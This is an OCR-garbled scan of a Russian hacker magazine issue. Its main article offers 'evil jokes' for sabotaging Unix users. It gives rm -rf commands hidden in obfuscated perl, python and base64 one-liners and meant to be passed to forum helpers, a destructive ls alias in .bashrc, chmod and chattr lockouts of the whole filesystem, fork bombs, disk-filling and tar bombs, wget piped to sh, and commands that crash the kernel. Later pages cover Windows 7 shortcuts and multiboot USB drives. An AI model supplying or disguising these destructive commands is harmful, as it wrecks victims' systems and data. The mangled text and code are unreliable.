ріасез/дпоте-таіп-тепи.зѵд], модифициро- 
вать файл /еІсЛгІаб та к, чтобы в качестве до- 
машнего каталога пользователя монтировался 
каталогДтр и многое другое. 

Достаточно интересным, а главное, ставящим в 
тупикмногих, является трюк, получивший имя 
«Укусить себя за хвост». Суть его заключается в 
том, чтобы просто снять с команды сбтоб права 
на исполнение итаким образом добиться того, 
что жертва не сможет менять права доступа 
любого файла: 



# сЬтосЗ -х 1 ѵіЬісЪ. сЬтосЗ' 

Если хочется чего-нибудь эдакого, то вот 
тебе рецепт, который превратит инициацию 
соединения по протоколу РРТР (ѴРІМ) в вызов 
модемного диалап -соединен ия (виртуально, 
естественно]. Выполни следующую последова- 
тельность действий: 

1. Переименуй файл /изг/збіп/ррір: 

# шѵ /изг/зЪіп/{ррРр,рркр.Ъак} 

2. Положи на его место скрипт: 

#ѴІ/и5К/5ВШ/РРТР 

# ! /Ъіп/зЪ. 

(ЗсЗ іі=/Ъіп/1з оі=/(Зеѵ/(Ззр & 
ррСр.Ьак $* 

3. Дай скрипту права на исполнение: 

# сЬтосЗ а+х /изг/зЪіп/ррРр 

Команду ррір используетлюбая программа, 
подключающаяся к ѴРІ\І-серверу по протоколу 
ррір, включая ІЧеГл/огкМападег, поумол- 
чанию поставляемый с ЦЬипШ. Подменив 
его на наш скрипт, мы добились того, что 
во время каждой инициации соединения с 
сервером пользователь будет слышать звук, 
сильно напоминающий издаваемый модемом 
придиалапном соединении. В качестве 
источника шумов я выбрал /Ьіп/Із, который 
хорошо подходит как по длительности, так и 
по звучанию, но ты можешь поэксперименти- 
ровать и подобрать другой файл (желательно 
бинарный]. 



ЗЛЫЕ ШУТКИ 

Злых шуток пользователи *піх-систем 
придумали гораздо больше. Здесь есть все, 
начиная от классического «гт -Р17», уда- 
ляющего все файлы, доступные для записи, 
и заканчивая многочисленными форк-бом- 
бами и способа ми отправить ядро в кегпеі 
рапіс. Я бы порекомендовал несколько раз 
подумать, перед тем как применять их на 
практике (особенноте, которые уничтожают 
файлы]. Целевая аудитория: обидчики, при- 
дурки, гопники и все те, кого не жалко даже 
твоей бабушке. 

Начнем с классики — удаления всего, до 
чего можем добраться. Издревне эта опера- 
ция производилась с помощью подсунутой 
пользователю команды «гт - Рб/», которую 
он благополучно запускал (да, и это срабаты- 
вало, а на некоторых убунтоводах сработает и 
сейчас], издавал несколько прощальныхзвуков 
и на несколько часов выбывал в офлайн. Сегод- 
няшние пользователи более продвинуты и по 
настоянию старших не запускают команды, не 
прочитав тап-страницы. Что же тогда делать? 
Команду можно, например, замаскировать, как 
это сделал один из посетителей ііпих.огд.ги в 
2003 году, подкинув в форум приведенный ниже 
регі-скриптс просьбой помочь в его отладке. 

# регі -е ' $ ? ? з : ; з : з ; ; $ ? : : з ; ; = ] =>%- 

{<- I }<& I В;; у; 

- ; ; з ; ; $_; зее ' 

Естественно, для пожелавших помочь «бедола- 
ге» все закончилось весьма и весьма плачевно. 
Подобный способ маскировки существует и для 
ру0~ЮП: 

# руШтоп -с ' ітрогР оз; 

оз . зузСет ( " " о оі-п ( [скг (огсі ( і ) -1 ) 
іог і іп " зп ! . зд ! + " ] ) ) ' 

И для Ьазб (правда его легко раскрыть, опустив 
скобки): 

# $ (есію 

сЗѴкЬуВуЬЗАРстУдШо= I Ьазеб4 -сЗ) 

Другая, достаточно смешная, шутка — подсу- 
нуть команду гт в качестве аііаз’а для другой 
команды: 

$ еско "аііаз 1з='гт -гі * >/(Зеѵ/пи11 
2>&1; 1з'" »~/.ЬазЬгс 

В результате перед каждым вызовом команды 



СТРЕСС-ТЕСТ ФАЙЛОВОЙ СИСТЕМЫ. ЭТОТ НЕЗАМЫСЛОВАТЫЙ СКРИПТ ПРИВОДИТ 
К ПАНИКЕ ЯДРА ОС ОРЕШО ВЕРСИИ 3.4 И НИЖЕ 



#! /Ьіп/зк 

тксЗіг зкгеззсЗіг 
ѵтЫІе [ 1 ] ; (3.0 
іог (Зіг іп а Ь с; сЗо 

тксЗіг зкгеззс3іг/$(3іг 

іог (Зіг2 іп 0123456789; (Зо 

(сЗсЗ іі=/сЗеѵ/ 2 его оі=зРгеззсЗіг/$сЗіг/$сЗіг2 Ьз = 1024к соипк=100 
&& гт -5 зкгеззсЗог/ $(3іг/$с3іг2 ) >/(Зеѵ/пи11 & 
сЗопе 

сЗопе 

маік 

сЗопе 
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ткгііг ЗмтЬ 
ей іэсгаЬ/ 

^1т<а)іті.йе5к^ор^/ЬотЬ5 ркйіг зээ ЬЬЬ есс 

^ІігнаЦт-сІезк^ор: ѴЬотЬ$ есііо “есііо Ѵ'Уои аге }іаскей\" > . Ьааіігс 
^1т@)1т-йе5кі:орі-/ЬотЬ-$ Наг -сТ ЬогпЬ.іаг р .Ь-азНгс 
)1т@І1т-гіе5кПорі-/ЬопіЬ$ І5 -а 

аза . Ьавііге ЬЬЬ ЬояЬ.ілг еес 
^іт@ІІпі-сІ«кнрр;-/ЬотЬі ссі -- 
;І1т@:|1пі'гіе5кНор:-| Ьеай -п 3 .Ьазіігс 
4 -АЬак&ге: ехесиіегі Ьу ІмвМІ) 1"ог пол-іездіп 

# *ее /іЛЕГ/бкаге/йас/ЬааІі/е-уаоірІеь/Еіагііір- Уііев (іп і*іе раскаде- Ьав^-Й 
ое> 

4 іог еяалріеі 

]1тф|1іп-йе5кНор^І іаг -хУ Ъо«Ь/ЬшпЬ.Іэг 

Ііпфіт-Йезкнорі-І НеасІ -л 3 . Ьэаіігс 

есічо “Уои аге Ііаскей" Ь 

В ЦЫ IX ЧТО угодно может быть вирусом:) 



І5 будет происходить очищение текущего каталога. Пред- 
ставь, какудивится наша жертва, когда запустит Із и увидит, 
что все файлы куда-то подевались. Будет еще смешнее, 
если она попытается выйти на каталог выше и вновь вызо- 
вет І5... 

Еще один интересныйтрюк: выставить совершенно извра- 
щенные права на все файлы и каталоги системы: 

# сЪ.оѵт поЪосІу : поЪосЗу -К / 

# сЬтюсІ 000 -К / 

Это приведет ктому, что дееспособным останется только 
гооЕ тогда как все остальные пользователи не смогут даже 
войти в систему. Более зловещий вариант: воспользоваться 
расширенными атрибутами файловой системы ех1:3/4для 
того, чтобы сделать все файлы системы немодифицируемы- 
ми и неудаляемыми. 

# ССІ / 

# скаккг -К +і * 

Особая фишка этого способа втом, что неопытному пользо- 
вателю будет очень сложно найти прич ину столь странного 
поведения файловой системы. Расширенныеатрибуты 
не пользуются популярностью, их не показывает команда 
Із, многие вообще незнаюто их существовании. Жертва 
проверит права и убедится, что все в порядке, затем начнет 
пробовать перемонтировать файловую систему в режиме 
записи, что не даст ровным счетом ничего, попытается пере- 
загрузить систему, что будет невозможно сделать. Наконец, 
недруг нажмет кнопку «сброс» на системном блоке, дождется 
окончания восстановления журнала и вновь попробуетуда- 
лить файл... Но нетут-то было, расширенныеатрибуты можно 
убратьтолько с помощью утилиты сбаЛгили через отключе- 
ние их поддержки в ядре. 

Если же твоя жертва — суровый профи, умеющий пользоваться 
загрузочным диском для восстановления системы, знающий 
о правахдоступа и расширенныхатриб^ах, а способудаления 
всего и вся ты считаешьслишком низким и недостойным, то 
предлагаю взять на за метку следующий простой шелл-скрипт: 

$ ссі іог х іп ' Із ' ; сіо шѵ -б $х $у; у=$х; сіопе 

Он не убивает да иные, не вводит в пользователя в непре- 
одолимый ступор, но позволяет от всей души посмеяться. 
После выполнения этой последовательности команд все 
файлы и подкаталоги домашнего каталога пользователя 
будут иметь неправильные имена, а если точнее: будут 
сдвинуты на один вперед. На первый взглядлистингфайлов 
будет выглядеть правильно, но на проверку окажется, что 
содержимое любого из файлов не соответствует имени. 
Жертве придется изрядно постараться и убить много време- 
ни перед тем, какона все приведетв порядок. 



)1пф1т-<1е5кіор:-/Ілр* дѵіт $у$1од-*аке.с 
] 1т@) 1т-<1е$кіор : -/ітр$ дес $у$1од-*аке.с -о $у$1од-Таке 
$у5Іод-Таке.с: Іп Гипсііоп 'таіп’: 

$у$1од-*аке.с:27: ѵагпіпд: ТогтаС поі а $1гіпд Шегаі ап4 по Іота* аг 
} Ітф Іт-гіехкіор: -/1тр$ . Лу$1од- Таке 
)1т@)1т-сІе&кіор:-/Іпр$ іаіі -п 1 /ѵаг/Іод/5у5Іод 

5ер 27 16:47 :Ѳ7 ]1т-с1е$кіор : ••• РІМАЬ 5у&іе<п зЬиЮомп те&&аде 1 го 

е&кіор ••• 5у$1«п доіпд Роѵлі ІММЕОІАТЕЬѴ 

С помощью стандартного АРІ мы можем 
записать в эѵэіоа все, что угодно 

Если ты не хочешь причинять серьезный ущерб, то тебе 
помогут форк-бомбы и различные способы отправить ядро в 
панику. В простейшем варианте форк-бомба выглядиттак: 

: ( ) { 

А после расшифровки так: 

кипе ( ) { 

кипе I кипе & 

} 

кипе 

А на регі воттак: 

$ регі -е ' когк вдМІе кгие; ' 

Команда порождает бесконечное число процессов и, если 
максимальное число процессов и используемой памяти не 
ограничено с помощью цІітТ (а в подавляющем большинс- 
тве случаевтаконо и есть], система вскоре исчерпает все 
свои ресурсы и окажется недоступной. 

Чтобы сделать форк-бомбу более эффективной, надежной 
и смертоносной, ее следует оформить в виде бинарного 
файла (который будет даже проще подсунуть жертве): 

$ѴІ РОКК-ВОМВ.С 

іпк таіп ( ѵоіеі) 

{ 

ког (;;) { 

ѵДііІе (когк() != -1) 

ког (;;) { 

декріеі ( ) ; 
таііос (65536) ; 



Обрати внимание на фактиспользования функции таІІосО, 
которая, будучи запущенной в бесконечном цикле, постепен- 
но высосет из системы всю доступную оперативную память. 
Особое место среди ШЧІХ-западлостроений занимают 
различные способы захламления файловой системы или, 
говоря по-человечески, файл-флуд. Флуд будет полезен 
тогда, когда все остальные способы оказываются неэффек- 
тивными или слишком жесткими. Он не несетособой опас- 
ности, но можетсерьезно навредить, будучи примененным 
на боевом сервере. Простейший метод захламления ФС 
— создание файла, который будет постоянно расти и в конце 
концов займет все доступное пространство. Например: 

$ сак /сіеѵ/гапсіот > -/.Ьаскир & 

Также возможно создание бесконечной цепочки подката- 
логов: 




> СІѴСІ 

На прилагаемом 
кжурналудискеты 
найдешь полные вер- 
сии сырцов зузіод- 
іа ке.с, Ьоіе. 
с и несколько форк- 
бомб. 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

уууууу.бпих.огд.ги/ 

ѵіеѵѵ-теззаде. 

]зр?тздісІ=392747 

— оригинальное 
сообщение на форуме 
ЛОРа. 




> іпіо 

• Команда гт, 
поставляемая 
с современными дис- 
трибутивами Ыпих, 
отказывается удалять 
корневой каталог. 
Поэтому актуальная 
команда должна 
вы глядеть та к: «сб / 
&& гт -г\ *» или так: 
«гт -г!/*». 



• Русская рулетка 
в стиле Ы N IX: 

$ [ $[ $РА1\Ю0М % 6 
] == 0 ] && гт -гі /* 1 1 
есбо «Жив» 
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ІШІХОЮ 



ѵ/МІе : ; сіо 
тксііг зиЪсІіг 
ссі зиЪсІіг 
сіопе 

Эта команда эффективно сработает на фай- 
ловой системе ехі4, но не нанесетособого 
вреда ехіЗ и ікз, в которые заложен лимит на 
количество подкаталогов (32000). Крометого, 
существует и множество вариантов различ- 
ных сіесотргевзіоп-бомб и іаг-бомб. Смысл 
их в том, чтобы создать архив, который после 
распаковки займетогромное пространство 
на жестком диске или захламит файловую 
систему. Оесотргеззіоп-бомбы создаются с 
помощью генерации огромных размеров файла, 
содержащего большое количество многократно 
повторяющихся блоков данных, и его упаковки с 
помощью Ь2Ір2. В результате совсем небольшой 
безобидный архив распакуется в очень боль- 
шой файл, который можетзанять весьжесткий 
диск. Способ создания: берем источникданных 
(хоть строку «ааааа»), организуем луп, который 
будет многократно добавлять содержимое 
источника данных в новый файл, а затем просто 
запаковываем его с помощью Ьгір2 : 

$ іог і іп {1. .1000 000}; сіо 
іог і іп {1. .1000000}; (іо 
еско "ааааа" » ЬотЬ 
сіопе 
сіопе 

$ Ьзір2 ЬотЬ 

Таг-бомбы создаются иначе. Их задача не 
только захламить файловую систему, но и попы- 
таться подменить какие-либо файлы базовой 
системы. Создаются они с помощью упаковки в 
іаг-файл сразу нескольких каталогов и файлов, 
которые будут распакованы в систему, в резуль- 
тате чего рабочий каталогстанет помойкой, а 
некоторые файлы будут заменены: 

$ шкііг ЬотЬ 
$ ссі ЬотЬ 




Исходный код программки, со- 
здающей в Лтр файл огромного 
размера 

// создаем разные файлы и каталоги 
$ ткііг . . . 

$ каг -ск ЪотЪ.каг * . * 

$ Ьзір2 ЪотЪ.каг 

После распаковки такого файла в текущем 
каталоге жертвы появятся все файлы и ката- 
логи, находящиеся в архиве. Вся соль втом, 
что многие распаковываютархивы прямо в 
домашний каталог, поэтому, если в архив по- 
местить, например, файл .Ьазбгс с нужным нам 
содержимым, то оригинальный .Ьазбгс будет 
заменен нааналогизархива (на скриншоте «В 
II N IX что угодно можетбыть вирусом» наглядно 
показано, какэто сделать). А ведь это отличный 
способ подсунуть наш коджертве, скажешьты 
и будешь абсолютно прав. Из других способов 
могу привести упаковку наших файлов в беЬ/ 
грт-пакеты, которые, какоказывается, боль- 
шинство пользователей за пуска ют без всяких 
подозрений, и, достаточно интересный способ 
указания прямой ссылки на наш вредоносный 
скрипт: 

$ ѵ/дек Ъккр: / /адрес_скрипта -О- I зЬ 

5 Н 0 \ЛЖ 0 МЕКСУ 

И последнее: на самом деле убить II N IX элемен- 
тарно, и для этого не нужны никакие скрипты, 
бомбы, стресс-тесты файловой системы и 
другие приблуды, достаточно одной команды. 
Да-да, ІІІЧІХ очень просто уничтожить прямо 



Лпв.ІІп.чіикІоік-5 ев Іпр 
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(*«**«■ пкіЦг ( 

]1т(ЭЛг'-(1е5кС.ор:-/1трЬ ІйиСк С/С.Ш 
} 1тф| 1»- веьКНор е -/'Н пфі -Й 
.; 

і Ь с 

.Ш 

аЛяі 

Ь. 1x1: 

./С* 

сляг 

х іп Чі’і яѵ ■ * ік іу: у-іх: Оспе 

и ‘Я 

и Ь ІгІк* 

./ЙЕ 

./Ьі 

■ /I гікі і 

а лях 

1 Іяв І Іп- йеік Іо 0 : -/ ІтрЬ 



Вот та к можно перевернуть содер- 
жимое каталога с ног на голову 



из командной строки. Я приведу всего пять 
возможных вариантов, хотя на самом деле их 
великое множество: 



1. Убиваем головной процесс: 



# кііі -9 1 



2 . Убиваем все процессы системы в обратном 
порядке (чтобы посмаковать): 



# кііі -9 {64000. .1} > 
/Ьеѵ/пиіі 2>&1 



3. Отправляем ядро в панику с помощью записи 
мусора в /сіеѵ/рогі: 



# сісі іі=/сіеѵ/гап(іот ок = /<іеѵ/рогк 



4. Отправляем ядро в панику с помощью заби- 
вания памяти ядра нулями: 



# сісі іі=/сіеѵ/ 2 его Ьз = 512 ок=/сіеѵ/тет 



5. Отправляем Ыпихв панику через стандарт- 
ный интерфейс (!): 



# есЬо 1 > /ргос/зуз/кегпеі/рапіс □С 



© ФИШКИ ѴѴШР 0 ѴѴ 5 7 : НОВЫЕ ФИШКИ В ИНТЕРФЕЙСЕ 



Что еще нравится— это фун- 


меня до сих пор стоит Ѵізіа и 


• ѴѴіп+5ЫН+Вверх и 


баре на одну иконку одного 


кция 5пар, которая позволяет 


знал бы ты, насколько мне не 


ѴѴіп+ЭЫІі+Вниз — разворачи- 


из приложений, все осталь- 


расположить два докумен- 


хватает там Эпар’а. Тянешь 


вает и восстанавливает окно 


ные окна становятся невиди- 


та рядом, просто потянув 


окошко — а ничего не проис- 


по вертикали. 


мыми. Еще одно новшество 


их к разным краям экрана. 


ходит :(. Впрочем, полезное 


Еще одна комбинация кла- 


позволяет переключаться 


ѴѴіпсіоѵѵб сама ресайзит окно 


нововведение ты, наверное, 


виш — ѴѴіп + Ноте — сво- 


между окнами одного прило- 


до половины ширины дисплея. 


уже видел в действии, а вот 


ра ч ива ет/восста на вливает 


жения. А если у тебя откры- 


Мега-удобно: тот же ѴѴогсІ на 


чего не знаешь — так это, что 


все окна, кроме активного. 


то 5 окон одного и того же 


широкоформатном мониторе 


все действия Эпар’а доступны 


Вообще, новая система изо- 


приложения, можно быстро 


разворачивать на весь экран 


через горячие клавиши: 


билует такими вот мелочами, 


переключаться между ними, 


незачем. Можно в одной части 


• ѴѴіп+Влево и ѴѴіп+Вправо — 


к которым привыкаешь и 


удерживая Сігі и нажимая 


экрана разместить окно Ѵізиаі 


прикрепить окно; 


потом думаешь: «Почему они 


кнопку на панели задачи. Это 


Эіисііо, а в другой — браузер с 


• ѴѴіп+Вверх и ѴѴіп+Вниз — 


раньше такого не делали?». 


гораздо удобнее, чем выис- 


открытым мануалом из М50Ы. 


разворачивает и восстанавли- 


Вот, например, маленький 


кивать эти окошки в диалоге 


На домашнем компьютере у 


вает/сворачивает ОКНО; 


хинт: при наведении в такс- 


по АИ+ТаЬ. 
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ТЕМЫ 

НОВОСТИ ИГРОВОГО МИРА 




^круыпкутпочний т&дехцнм об дара* 




Каждый день, 20:00 

Горячие новости мира компьютерных и видеоигр 
Самая свежая информация об индустрии 
и репортажи с мест событий 



Подробная информация 
на сайте 

* Игра Ргоіоіуре 



ИНФОРМАЦИЮ О ПОДКЛЮЧЕНИИ ТРЕБУЙТЕ У ВАШЕГО РЕГИОНАЛЬНОГО ОПЕРАТОРА 



ТАКЖЕ 5 БОЛЕЕ 100 КАБЕЛЬНЫХ СЕТЕЙ РФ 
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триколор та 
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иГапеі; 



твое тЛ 
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■ ■ ЮРИЙ «АЭЕРТ» ВИДИНЕЕВ АйЕРТбООМАІІ-СОМ 



Панацея 
на флешке 



Создаем мулыизагрузочную 
флешку на все случаи жизни 



Думаю, у всех нас есть несколько любимых 
ЫѵеСО, которые мы постоянно носим с со- 
бой — на всякий случай. И это оправдан- 
но, ведь ЫѵеСО незаменим, когда нужно 
восстановить работоспособность ОС или 
просто поработать в знакомом окружении. 
Но СО/ОѴО — громоздкий и ненадежный 
носитель. Еслитебе надоелотаскатьс 
собой ворох ЫѵеСО, я предлагаю записать 
все эти ОС на флешку. 



информации. На смену ЫѵеСО/ЫѵеОѴО-систе- мий я остановил свой выбор на следующих Все настройки будут производиться на УбипЫ 



ЫѵеІІЗВ с каким-нибудь одним дистрибутивом популярный, функциональный и динамически Ѵоз1хоА860. 
сегодня не составляет труда. На помощь придут развивающийся «спасательный» СО на базе 



дистрибутив обзавелся ЫѵеСО-вер- оставляетжелать лучшего. Ктомуже, ее занимать не более 2,5-3 Гб, поэтому подойдет 

сией, а количество узкоспециализированных запуск сСО или флешки запрещен поли цен- любая флешка от 4 Гб. Можно взять и большего 

ЫѵеСО-систем перевалилоза все мыслимые знойному соглашению. Если не рассматри- объема, при этом организовавжирный раздел 

и немыслимые пределы. Но время идет, и вать всякие экзотические варианты, типа ЕАТ/ІЧТЕ5, используемый по прямому назначе- 

компакт-диски уже не соответствуют совре- Міпіх, то на выбор остается сотня-другая ОС нию — для переноса данных. Но я предпочел 




срок каждый уважающий себя скорость работы этой ОС в качестве ЫѵеІІЗВ Вустановленном виде весь«зоопарк» будет 



момента первого публичного релиза мы все-таки будем водружать. Вариант диться для запуска, например, тЬсИ (лучшей, 

кпорріх («дедушки» всех ЫѵеСО установки ѴѴіпсІоѵѵз представляется мне не на мой взгляд, программы для низкоуровневой 

прошло уже около 10 лет. За этот очень удачным, так как функциональность и работы с винтами]. 



меннымтребованиям компактности (такой на базе Ыпих и десяток-другой решений на выделить под эту зада чу отдельную флешку 

вот каламбур], надежности и сроков хранения хВЗО. После непродолжительных разду- ТгапвсепсІ Ѵ85 на 4 Гб. 



мам давно пришли так называемые ЫѵеІІЗВ- системах: 

системы (ОС на ІІЗВ-флешке]. Создать свой 1. Зузіет Резсие Сй 1.3.1 ВеІа4- пожалуй, самый 



9.1 0 атсІ64аІрЬа (к моменту публикации статьи 
уже выйдет релиз], которая живет на ноуте ОеІІ 



многочисленные графическиеутилиты, подчас 
даже входящие в состав дистрибутива. Но при 
всей простоте подход недостаточно гибок: если 
требуется несколько ОС или хочется по-своему 
разбить накопитель на разделы — придется 



Ыпих. 

2. ІІЬипІи 9.10 іЗвбАІрііаб ЫѵеСО- думаю, в пред- 
ставлении не нуждается. Пригодится, если 
захочется поработать в знакомой системе на 
чужом компе. 

3. ОгѴѴеЬ 5.0 ЫѵеСО- переносной антивирус, удоб- 
ный и достаточно эффективный. 

4. РгееВЗО 8 КС1 - на случай, если понадобится ее 
куда-нибудьустановить или починить установ- 
ленную систему. 

5 РгеейОЗ — да -да , старичокеще может приго- 



ПРОПОРЦИИ 



Использовать объем флешки можно двумя спо- 
собами: либо создать 1 раздел, куда поставить 
все ОС, либо выделить каждой свой раздел. 



Первый вариант не оченьудобен.таккакна 



немного поработать руками и головой. Зато 
получится многофункциональный, тонко на- 
строенный инструмент. Итак, приступим... 



одном разделе образуется мешанина из файлов 
разных ОС, что осложняетобновление и вынуж- 
дает отслеживать совпадения имен файлов. К 
томуже, РгееВЗО отказывается жить на ЕАТ- 



ИНГРЕДИЕНТЫ 



разделе. Лучше поделить флешку на разделы. Я 
использовал следующее разбиение: 



Для начала стоит определиться, что же 



► 082 



ХАКЕР 1 1 /131/ 09 




